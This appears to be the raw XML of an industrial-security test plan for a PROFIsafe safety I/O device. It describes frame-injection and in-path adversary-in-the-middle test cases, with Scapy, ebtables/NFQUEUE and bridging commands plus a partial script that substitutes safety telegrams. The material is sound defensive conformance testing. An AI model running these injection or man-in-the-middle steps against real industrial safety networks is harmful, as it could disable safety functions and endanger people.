          <w:p w14:paraId="7C04E8FA"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iface=iface, count=5, inter=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="636AB07C"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F017405"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(b) bit-flipped payload with stale (unmodified) CRC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45CC97AB"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flipped_payload = bytes.fromhex("</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>REPLACE_WITH_BITFLIPPED_HEX_PAYLOAD</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54E34945"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sendp(Ether(dst=target_mac, type=0x8892)/Raw(load=flipped_payload),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E7EC737"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iface=iface, count=5, inter=0.05)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50AD5914"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PYEOF</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="253F34C6"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4D867F9" w14:textId="665DDD12"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Step 7: run the injection </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D197F57"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sudo python3 cm_rq001-03_inject.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56371C2C" w14:textId="77777777"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B40AFA9" w14:textId="68479093" w:rsidR="00867718" w:rsidRPr="006D5B99" w:rsidRDefault="00867718" w:rsidP="0086771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Step 8: on the TIA laptop, observe the watch table (Qualifier bits) and</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CAB9261" w14:textId="514D9CA9" w:rsidR="00867718" w:rsidRPr="006D5B99" w:rsidRDefault="00867718" w:rsidP="00867718">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Online &amp; Diagnostics &gt; Diagnostics buffer for any reaction </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C81D0A" w:rsidRPr="006D5B99"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0EC4FD85" w:rsidR="00C81D0A" w:rsidRPr="006D5B99" w:rsidRDefault="00C81D0A" w:rsidP="00C81D0A">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C566FEF" w14:textId="77777777" w:rsidR="004E52B5" w:rsidRPr="006D5B99" w:rsidRDefault="00C81D0A" w:rsidP="00C81D0A">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Expected PASS </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FC4DBFF" w14:textId="77777777" w:rsidR="00DC4262" w:rsidRPr="006D5B99" w:rsidRDefault="00CA0401" w:rsidP="00C81D0A">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w:t>
            </w:r>
            <w:r w:rsidR="00C81D0A" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> telegrams with a wrong destination address or an invalid/stale CRC are rejected by the SRIO (the qualifier stays „good“ based on the legitimate traffic; no unauthorized state change occurs). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1647F32F" w14:textId="63CAA265" w:rsidR="00C81D0A" w:rsidRPr="006D5B99" w:rsidRDefault="00C81D0A" w:rsidP="00C81D0A">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000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence: cm_rq001-03_baseline.pcapng, cm_rq001-03_inject.py, TIA screenshot of the watch table / diagnostics buffer.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1BA5F102" w14:textId="77777777" w:rsidR="00EE3A78" w:rsidRPr="006D5B99" w:rsidRDefault="00EE3A78" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FDB8FE" w14:textId="1D64073A" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11457BA8" w14:textId="18770263" w:rsidR="000A2322" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ001-04 </w:t>
      </w:r>
      <w:r w:rsidR="00AF57B2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A2322" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In-Path Adversary-in-the-Middle Boundary</w:t>
      </w:r>
      <w:r w:rsidR="0071292D" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A3125" w14:textId="27340235" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 1 </w:t>
      </w:r>
      <w:r w:rsidR="00AF57B2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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53FD159A"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0587FC3E" w14:textId="276FA49F" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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RQ-001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 Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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5BA4728E" w14:textId="60828254"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Spoofing + Tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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34A715BD" w14:textId="0A5D88D7"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5638E6" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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2D90A79D" w14:textId="20E6D9C9" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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6D5B99"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5B6AE2ED"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Insert a controlled in-path element between the legitimate producer and the safe consumer.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E9077F0"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Suppress the legitimate producer's telegrams.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="775603DB" w14:textId="77777777" w:rsidR="00871F11"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Continue the consecutive-number sequence and inject a fully valid-integrity telegram carrying modified process data.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="241E624B" w14:textId="39DEE850" w:rsidR="006A2F66" w:rsidRPr="006D5B99"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consumer accepts the substituted stream or detects the takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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6FDD2BC9"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Boundary-characterization test (not scored as a device FAIL). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10FC16D6" w14:textId="77777777" w:rsidR="00871F11"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6D5B99"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device FAIL is recorded only if a parallel (non-in-path) injection, without producer suppression, is accepted, which would indicate a genuine consumer-side defect.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C191952" w14:textId="77777777" w:rsidR="006A2F66" w:rsidRPr="006D5B99" w:rsidRDefault="006A2F66" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC50AB4" w14:textId="139BD954" w:rsidR="00DB074F" w:rsidRPr="006D5B99" w:rsidRDefault="00DB074F" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Level 2 </w:t>
      </w:r>
      <w:r w:rsidR="00AF57B2" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">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6D5B99"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6D5B99" w:rsidRDefault="00DC4974" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43431F4C" w14:textId="77777777" w:rsidR="00DC4974" w:rsidRPr="006D5B99"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C4974" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00DC4974" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10339B02" w14:textId="3883E84C" w:rsidR="00DC4974" w:rsidRPr="006D5B99"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TC-RQ001-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC4974" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00DC4974" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AC3E10A" w14:textId="0637816B" w:rsidR="00DC4974" w:rsidRPr="006D5B99" w:rsidRDefault="00876216" w:rsidP="00876216">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NV3 (inline bridge)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC4974" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00DC4974" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A4C0C36" w14:textId="2A1755C0" w:rsidR="00DC4974" w:rsidRPr="006D5B99" w:rsidRDefault="000A2056"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Linux bridging (iproute2), ebtables + NetfilterQueue, Scapy (pip install NetfilterQueue scapy), Wireshark.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D23C8" w:rsidRPr="006D5B99"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8D23C8" w:rsidRPr="006D5B99" w:rsidRDefault="008D23C8" w:rsidP="008D23C8">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D67FCF8" w14:textId="33C3349C"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1: build a transparent bridge on Kali </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69607D59"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add name br0 type bridge</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35B5B592"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set eth0 master br0     # onboard NIC, now connected to SRIO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17036DA5"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set eth1 master br0     # USB dongle, now connected to switch port 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="799210FB"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set eth0 up</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73A2564E"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set eth1 up</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D5E88C"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ip link set br0 up</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A470039"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Verify transparency first: TIA watch table must show the PROFIsafe connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40E081D8"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running unmodified through the bridge before proceeding.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FE20DF6"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1E3E960C" w14:textId="6A454548"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2: baseline capture of the consecutive-number sequence + CRC </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="620F119D"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tshark -i br0 -f "ether proto 0x8892" -w cm_rq001-04_baseline.pcapng</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7723AA45"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2E480B09" w14:textId="05DF6091"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3: redirect frames of interest into userspace via NFQUEUE </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CDC166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ebtables -A FORWARD -p 0x8892 -j NFQUEUE --queue-num 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42539DB2"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1CD58551" w14:textId="38C9443D"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4: NFQUEUE handler cm_rq001-04_mitm.py: drop the legitimate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46682B20"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producer's frames and inject a replacement frame with the continued</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="254B3508" w14:textId="1CE79378"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consecutive number and a freshly recomputed, valid CRC </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="513E358B"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cm_rq001-04_mitm.py &lt;&lt; 'PYEOF'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A98F3D4"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netfilterqueue import NetfilterQueue</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38CF0028"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7845C6D5"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27E9E47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last_seq = None  # track/continue the consecutive number here</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52EDC80C"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07205E0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def callback(pkt):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FC350E8"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global last_seq</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0303E0DA"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frame = Ether(pkt.get_payload())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D5B561"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TODO: parse consecutive number + process data from frame per</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F9C2E3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PROFIsafe layout (SRIO-2998); build 'modified' with continued seq</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75A50A7A"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number and process data changed, then recompute the 4-byte CRC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="578FF41D"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using the documented algorithm + CRC-Seed24/32 (public, from GSD file)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4894D7DF" w14:textId="729AFBEF"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modified = frame  # placeholder </w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> replace with actually modified frame</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="112A6FF7"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pkt.set_payload(bytes(modified))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24160410"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pkt.accept()   # 'accept' here re-injects the REPLACED frame;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BA6AF87"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use pkt.drop() on the original producer frame in a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44A8C674"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 separate rule/queue to fully suppress it</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19D22616"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2E0BDA95"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nfqueue = NetfilterQueue()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17CD4FA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nfqueue.bind(0, callback)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A74DAF6"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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3000D26E"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xml:space="preserve">    nfqueue.run()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A958F3E"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except KeyboardInterrupt:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46A509BA"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pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4472F3FF"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090745CC"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cm_rq001-04_mitm.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="770D5383"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5549AF77" w14:textId="5DDE104A"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5: observe whether the consumer (SRIO) accepts the substituted</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06DD5135"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stream (TIA watch table stays 'good') or detects the takeover (qualifier</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73812416" w14:textId="18A7A839"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bad / diagnostic alarm) </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C5244EC"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p>
          <w:p w14:paraId="3B2ADEFC" w14:textId="50C94733"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Step 6: cleanup </w:t>
            </w:r>
            <w:r w:rsidR="007F5260" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76B94DCC" w14:textId="77777777" w:rsidR="008D23C8" w:rsidRPr="006D5B99" w:rsidRDefault="008D23C8" w:rsidP="008D23C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ebtables -D FORWARD -p 0x8892 -j NFQUEUE --queue-num 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B997518" w14:textId="3DEA8CA9" w:rsidR="008D23C8" w:rsidRPr="006D5B99" w:rsidRDefault="008D23C8" w:rsidP="008D23C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sudo ip link set br0 down</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008D23C8" w:rsidRPr="006D5B99"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2C4D6A8F" w:rsidR="008D23C8" w:rsidRPr="006D5B99" w:rsidRDefault="008D23C8" w:rsidP="008D23C8">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="009AE7D8" w14:textId="77777777" w:rsidR="00406307" w:rsidRPr="006D5B99" w:rsidRDefault="00FC43DA" w:rsidP="008D23C8">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Boundary-characterization test (not scored as a device FAIL). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C86CF54" w14:textId="77777777" w:rsidR="007B35E8" w:rsidRPr="006D5B99" w:rsidRDefault="00FC43DA" w:rsidP="008D23C8">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Expected: the takeover is accepted as long as the legitimate producer is fully suppressed (confirms the documented residual-risk statement G-2 for RQ-001).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FC9E242" w14:textId="58E3F6FB" w:rsidR="008D23C8" w:rsidRPr="006D5B99" w:rsidRDefault="00FC43DA" w:rsidP="008D23C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000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> If the takeover is </w:t>
            </w:r>
            <w:r w:rsidR="007B35E8" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>not</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> accepted despite full suppression, this must be investigated and documented separately as a positive finding.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CF271AB" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="00DB074F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262A7DE2" w14:textId="77777777" w:rsidR="00327CF3" w:rsidRPr="006D5B99" w:rsidRDefault="006A2F66" w:rsidP="006A2F66">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ001-0</w:t>
      </w:r>
      <w:r w:rsidR="00B71C4E" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00B71C4E" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Channel-Disruption Watchdog Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B7E49" w14:textId="3F57CB99" w:rsidR="006A2F66" w:rsidRPr="006D5B99" w:rsidRDefault="006A2F66" w:rsidP="006A2F66">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6D5B99"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6D5B99" w:rsidRDefault="006A2F66" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="466C70A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6D5B99" w:rsidRDefault="006A2F66" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1142914A" w14:textId="31B8671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RQ-001 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> CR 3.1 / CR 3.6 </w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve"> Asset A, Asset C</w:t>
            </w:r>
            <w:r w:rsidR="00B71C4E" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t>, Asset E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A2F66" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="006A2F66" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
